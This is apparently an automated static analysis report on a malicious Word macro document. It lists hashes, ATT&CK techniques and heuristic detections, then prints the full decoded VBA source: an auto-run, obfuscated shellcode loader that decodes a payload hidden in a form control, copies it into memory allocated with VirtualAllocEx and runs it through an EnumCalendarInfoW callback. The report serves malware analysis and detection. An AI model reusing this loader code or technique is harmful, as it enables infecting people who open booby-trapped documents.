Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f78ab7aafc90ab1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 154.0 KB
Created: 2016-11-07 12:55:00
Authoring application: Microsoft Office Word
First seen: 2016-12-03
MD5: aa27bb30995f9336a4f6aeff751a76cc
SHA-1: 8ea29fb2dce8d6376694b9738c95ba06be457d34
SHA-256: 5f78ab7aafc90ab1d9f58c1e1c36ab284c668b82ac3e005f4cdfc4720a26c703
Risk Score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with a Document_Open auto-execution routine. Heuristics flag a reference to the VirtualAlloc API and a GetObject call, consistent with in-memory allocation and object manipulation in support of payload execution. The ClamAV detection name 'Doc.Dropper.Agent-1820965' strongly implies dropper functionality: the macro most likely downloads and executes a secondary payload. No specific family could be identified, but the behaviour is consistent with a macro-based downloader.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-1820965 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-1820965
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • GetObject call [high] (OLE_VBA_GETOBJ)
    Matched line in script:
        Set wdApp = GetObject(, "Word.Application")
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Matched lines in script:
        Private Sub Document_Open()
        Dim harmony As Long
  • Reference to VirtualAlloc API [medium] (SC_STR_VIRTUALALLOC)
    A string referencing the VirtualAlloc API was found in the sample
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs below are XMP/RDF metadata namespace identifiers of the kind carried in embedded image metadata, not network destinations contacted by the macro.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  12521 bytes
SHA-256: 426b37a9119a79d46fd789aa516c632213ba43969f50c7d70546f32db2601930

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub upper()
    Dim InitialCaps As Range
     Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
        End:=ActiveDocument.Words(3).End)
    InitialCaps.Case = wdUpperCase
End Sub

Private Sub Document_Open()
Dim harmony As Long
Dim adlumia As Integer
freeway = "concordiam"
obsessivecompulsive = LCase$("MaN") & Right$("athensufacture", 8)
postal
clutter = 75
carboy = 93
If clutter + carboy < 10 Then
clutter = LCase$("cAse") & LCase$("HARDEN") & Mid("scorpionidaedsharping", 12, 2)
subscribed = subscribed
entellus = Right$("beastsbo", 2) & LCase$("oKcA") & LCase$("SE")
Else
nestling = nestling / 252
carboy = 88
End If
End Sub
Function halfadozen(eaglet)
Dim cotta As Variant
Dim sempiternal As Variant
Dim costerman As Long
formalin costerman, ByVal VarPtr(eaglet) + 8, 4
Dim roan As String
Dim vibration As Integer
Dim catabiosis As Long
intervallo = 0
outgate = -1
decrepit = 126 + 35 + 71 - 232
circumgyration = Abs(82.382)

mini = "amulet"

admiring = 4096
twothirds = cortically(ByVal outgate, ByVal decrepit, 7382, admiring, 64)
circumgyration = Int(225.87)

formalin catabiosis, ByVal VarPtr(twothirds) + 8, 4
circumgyration = Round(379.1297)

formalin ByVal catabiosis, ByVal costerman, 5538
slot = 9
While slot < 14
slot = slot + 1
subscribed = mini
nestling = Int(454.1064)
Wend

halfadozen = catabiosis
End Function
Sub postal()
Dim account As String
Dim gorge As Byte
Set butcherbird = stilted.nothofagus.BoundValue("Tab2")
wobble = butcherbird.ControlTipText
hereinafter = 126 + 7242
doggedness = Right(wobble, hereinafter)
basidiomycota = arado.hunc(doggedness)
gansu = 94
chorus = 62
If gansu + chorus < 30 Then
gansu = Right$("conspicioussen", 3) & Right$("asphyxiatesualism", 7)
mini = "tringa"
cavaliere = LCase$("Mu") & Left("sefulindisposed", 5)
Else
subscribed = mini
chorus = 17
End If

homegrown = "consul"
grapple = Right$("searchint", 3) & Mid("catkinertidinside", 7, 5) & Right$("bewareal", 2)
#If VBA6 And Win64 Then
Dim alps As String
Dim bead As arcturus
Dim germanspeaking As LongPtr
bead.elseifstatement = 119 + 60 - 179
Dim cameroon As Integer
#Else
Dim loathe As Integer
bead = 0
Dim defatigation As Long
Dim germanspeaking As Long
#End If
marblewood = 0
drumlin = "swollen"
topping = 94 - 60 + 4062
adventurousness = 8
While adventurousness < 12
adventurousness = adventurousness + 1
mini = mini
mini = subscribed
Wend

amsinckia = "shocking"
princesfeather = "curvilinear"
apothecaries = "reinstate"
hurlyburly = 8
While hurlyburly < 11
hurlyburly = hurlyburly + 1
circumgyration = nestling / 265
circumgyration = Round(291.843)
Wend

dimly = basidiomycota
snowdrift = "dracocephalum"
germanspeaking = halfadozen(dimly)
driblets = Mid("anthropophagouscoupitprop", 16, 3) & UCase$("nTERC") & UCase$("Heck")
einstein = "hyperglycemia"
#If VBA6 And Win64 Then
Dim stultiloquy As Variant
grassy = "pining"
efflorescence = "meaningless"
direction = "scatterbrained"
expressions = 37 + 66 - 42 + 1219
#ElseIf Win32 Then
diligent = "phonics"
pegology = "fesse"
diastrophism = 21 + 485
expressions = diastrophism + 3171

#End If
Dim fief As Variant
Dim akee As String
Dim smallscale As Long
smallscale = 2048
Dim letun As Long
letun = germanspeaking + expressions
Dim manufactory As Long
manufactory = 1
ajar = coward(letun, smallscale, manufactory, manufactory)
For lilliput = 37 To 57
suturing = 57
subscribed = subscribed
tensiometer = Left("brafflatus", 2) & UCase$("EATh")
tensiometer = UCase$("aL") & Mid("electroencephalogramtarmaisonnette", 21, 3)
Next lilliput

End Sub



Attribute VB_Name = "arado"
'I hope that I don't bore you while I whine about it
#If VBA6 And Win64 Then
'so if it all fails just throw it back in my face and bury me
Public Type arcturus
'as soon as I escape there's more stagnant bullsshit
elseifstatement As LongPtr
'I hope you won't be saddened while I cry about it
End Type
'I keep telling myself that there's something more
Public Declare PtrSafe Function atriplex Lib "user32" Alias "SetParent" (ByVal accountantship As LongPtr, ByVal bellwort As LongPtr,toots As LongPtr) As LongPtr
'I'd like to think there's more something more
Public Declare PtrSafe Function extroverted Lib "user32" Alias "GetUpdateRect" (hylactophryne As LongPtr, diapensiales As LongPtr,pine As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public  Declare PtrSafe Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal occidental As Any, ByVal jottings As Any, ByVal rove As Any, ByVal impassible As Any) As LongPtr
'I can't watch things further complicate
Public  Declare PtrSafe Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (precedent As Any, guardhouse As Any, ByVal notification As LongPtr)
'I'd like to think there's more something more
Public Declare PtrSafe Function absentmindedness Lib "user32" Alias "EndPaint" (albification As LongPtr,mediate As LongPtr) As LongPtr
'I'm lost in this place it's such a waste
Public  Declare PtrSafe Function cortically Lib "kernel32" Alias "VirtualAllocEx" (biennial As LongPtr, iberomesornis As LongPtr, ByVal illicitness As LongPtr, ByVal midon As LongPtr, ByVal incontinence As LongPtr) As LongPtr
'on focusing destractions tear me open
Public Declare PtrSafe Function namtar Lib "kernel32" Alias "Sleep" (etymology As LongPtr)
'I keep telling myself that there's something more
Public Declare PtrSafe Function ladder Lib "user32" Alias "OpenClipboard" (alike As LongPtr) As Boolean
'Everyday I wake up to stagnant bullshit

'I hope you won't be saddened while I cry about it
#Else
'I hope you won't be saddened while I cry about it
Public Declare Function french Lib "user32" Alias "EndPaint" (nidicolous As Long, sapsago As Long) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (bruder As Any, obreptitious As Any, ByVal ballad As Long)
'have mercy please God erase us
Public Declare Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal cymbid As Any, ByVal ambiversion As Any, ByVal mineralized As Any, ByVal flood As Any) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Function diabetic Lib "user32" Alias "GetUpdateRect" (omnifarious As Long, droves As Long, chitchat As Long) As Boolean
'so if it all fails just throw it back in my face and bury me
Public Declare Function cortically Lib "kernel32" Alias "VirtualAllocEx" (anthologist As Long, calloused As Long, ByVal capillarity As Long, ByVal drapery As Long, ByVal chromosomal As Long) As Long
'all the thoughts in my head are constantly .. haunting me
Public Declare Function abc Lib "user32" Alias "OpenClipboard" (telegraphic As Long) As Boolean
'I'd like to think there's more something more
Public Declare Function motacilla Lib "user32" Alias "SetParent" (ByVal surrejoinder As Long, ByVal unaffected As Long, flimsily As Long) As Long
'I hope you won't be saddened while I cry about it
Public Declare Function brosmius Lib "kernel32" Alias "Sleep" (adjuvat As Long)
'I'm lost in this place it's such a waste

'I can't watch things further complicate
#End If
'so if it all fails just throw it back in my face and bury me
Function macleaya(facilitative, discredited)
macleaya = facilitative * discredited
End Function
Function isohel(fervor)
isohel = AscW(fervor)
End Function
Function incidentally(dicto, bos)
incidentally = dicto \ bos
End Function
Function annoyed(dabble, pisiform)
annoyed = dabble And pisiform
End Function
Function hunc(opportune) As String
circumgyration = circumgyration * 3

Dim despise(63) As Long
Dim abstinence(63) As Long
mini = "both"

Dim engorge() As Byte
Dim anaplasmosis(5525) As Byte
Dim whether(63) As Long
Dim stub As Long
Dim seines As Integer

Dim chalks(255) As Byte
Dim benzofuran As Long
Dim fearfully As Integer
Dim muove As String
Dim proturberance As Long
Dim weakkneed As Long
Dim tellurium As String

Dim eighteen As String

cemented = 53 + 70 + 3973
etat = 44 + 65236
Dim grip As String

Dim circumjacent As Long

highwayman = 16711680
dominantly = 123 - 11 + 143
streptolysin = 92 + 65444
marguerite = 126 - 62
agriculture = 63
cooperation = 262144
anachronism = 115 - 23 + 257956
Dim cimabue As Byte

tierce = 1 + 4031
adsorbed = 81 + 16514991
cacophony = 101 - 25 + 180
Dim favillous As Integer
Dim inguishable(7367) As Byte
curtained = 109 + 40 - 75 + 7294
For jaws = 1 To curtained
footlocker = Mid(opportune, jaws, 1)
tlingit = "chemiluminescence"
towhee = "design"
tensimeter = "amity"
alumina = isohel(footlocker)
inguishable(jaws - 1) = alumina
Next
Dim stratus As Long
wire = 79
nondiscrimination = 54
If wire + nondiscrimination < 15 Then
wire = LCase$("bA") & "rbec" & Right$("austromancyued", 3)
subscribed = mini
hectic = UCase$("wa") & Right$("apliterder", 4)
Else
circumgyration = Round(80.334)
nondiscrimination = 86
End If

danaea = 7367
brocaded = 35
For apt = 0 To danaea
inguishable(apt) = inguishable(apt) + 5
Next apt
cloudliness = 85
catching = 51
If cloudliness + catching < 32 Then
cloudliness = "me" & Mid("boundlessurtcuckoldom", 10, 3)
mini = "egotism"
amethyst = Right$("landgravebro", 3) & "nchos" & Left("pasmgly", 4)
Else
circumgyration = circumgyration And 422
catching = 101
End If

fearfully = 0
deific = 64 + 117 - 59
aftereffect = 255
For stub = 0 To aftereffect
If (stub >= 65) And (stub <= 90) Then
chalks(stub) = stub - 65
ElseIf (stub >= 97) And (stub <= 122) Then
chalks(stub) = stub - 71
ElseIf (stub >= 48) And (stub <= 57) Then
chalks(stub) = stub + 4
ElseIf stub = 43 Then
chalks(stub) = 62
ElseIf stub = 47 Then
chalks(stub) = 63
End If
Next stub
For stub = 0 To 63
despise(stub) = macleaya(stub, marguerite)
whether(stub) = macleaya(stub, cemented)
abstinence(stub) = macleaya(stub, cooperation)
Next stub
For bargaining = 30 To 61
astriction = 61
nestling = Fix(213.1021)
uti = UCase$("gaR") & Right$("inexorableambulla", 7)
uti = UCase$("DE") & UCase$("lIcTo")
Next bargaining

engorge = inguishable
aristarchy = 4
goasyouplease = 50
brotulidae = 74
If goasyouplease + brotulidae < 23 Then
goasyouplease = LCase$("de") & Right$("duckscolon", 5) & LCase$("IZATIOn")
circumgyration = Fix(469.712)
circumnavigate = LCase$("bA") & LCase$("RKeE") & UCase$("per")
Else
circumgyration = Fix(189.837)
brotulidae = 55
End If

divinities = 3
subscribed = mini

circumgyration = Round(462.418)

bichona = divinities + 1
painim = 113 + 101 - 212
For weakkneed = 0 To danaea
miraculous = engorge(weakkneed)
unoriginal = engorge(weakkneed + 2)
benzofuran = abstinence(chalks(miraculous)) _
 + whether(chalks(engorge(weakkneed + 1))) + despise(chalks(unoriginal)) + chalks(engorge(weakkneed + divinities))
stub = annoyed(benzofuran, highwayman)
anaplasmosis(proturberance) = incidentally(stub, streptolysin)
stub = annoyed(benzofuran, etat)
anaplasmosis(proturberance + 1) = incidentally(stub, cacophony)
anaplasmosis(proturberance + painim) = annoyed(benzofuran, dominantly)
proturberance = proturberance + painim + 1
weakkneed = weakkneed + 3
Next
hunc = anaplasmosis
End Function

Sub SelectSentence()
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    
    Set wdApp = GetObject(, "Word.Application")
    
    With wdApp.ActiveDocument
        If .Paragraphs.Count >= 3 Then
            Set wdRng = .Paragraphs(3).Range
            wdRng.Copy
        End If
    End With
    Worksheets("Sheet2").PasteSpecial
    Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub
Attribute VB_Name = "stilted"
Attribute VB_Base = "0{41F33EDB-7F26-4FE8-904E-14EDAF37791B}{3F8CCC1E-8E9B-4E9E-82A7-D367D9AD41E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False